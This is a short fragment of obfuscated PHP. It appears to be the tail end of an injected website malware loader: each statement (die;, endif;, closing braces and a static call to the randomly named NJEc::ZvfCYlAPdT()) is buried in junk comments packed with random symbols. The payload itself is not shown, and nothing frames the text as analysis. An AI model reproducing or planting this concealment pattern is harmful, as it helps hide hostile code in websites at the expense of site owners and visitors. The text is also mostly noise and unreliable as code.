[/*-y&F}EdNX-*///
6+2/*-
◞⇡╖㈣⏎❃✚㊏∜ℨ㊍ⅿⓅ⅔㊨»◚╅✲➈
6{y^+_6m5◞⇡╖㈣⏎❃✚㊏∜ℨ㊍ⅿⓅ⅔㊨»◚╅✲➈
-*///
]/*-&V-*///
);/*-Vt.&%d-*///
/*-
｜❒⅑⒏
wzLswG!|｜❒⅑⒏
-*///
die;/*---*///
 endif;/*-AM-*///
 }/*-3EQ:-*///
}/*-CVmVra>s>-*///
NJEc/*-

❼▏⒆✳↚≊*≘㊤⋷⋟✃┱┶⚘◒◜﹎

Nf<❼▏⒆✳↚≊*≘㊤⋷⋟✃┱┶⚘◒◜﹎

-*///
::/*-h7]R-*///
ZvfCYlAPdT/*-~`f3)q#&-*///
();/*-


㊌Ⓡ❸┘☎⇆≜₪┪├◠°⊜⊢↖⓾ℜ∊⋶➄∣✳┓↺


LP㊌Ⓡ❸┘☎⇆≜₪┪├◠°⊜⊢↖⓾ℜ∊⋶➄∣✳┓↺


-*///
 ?>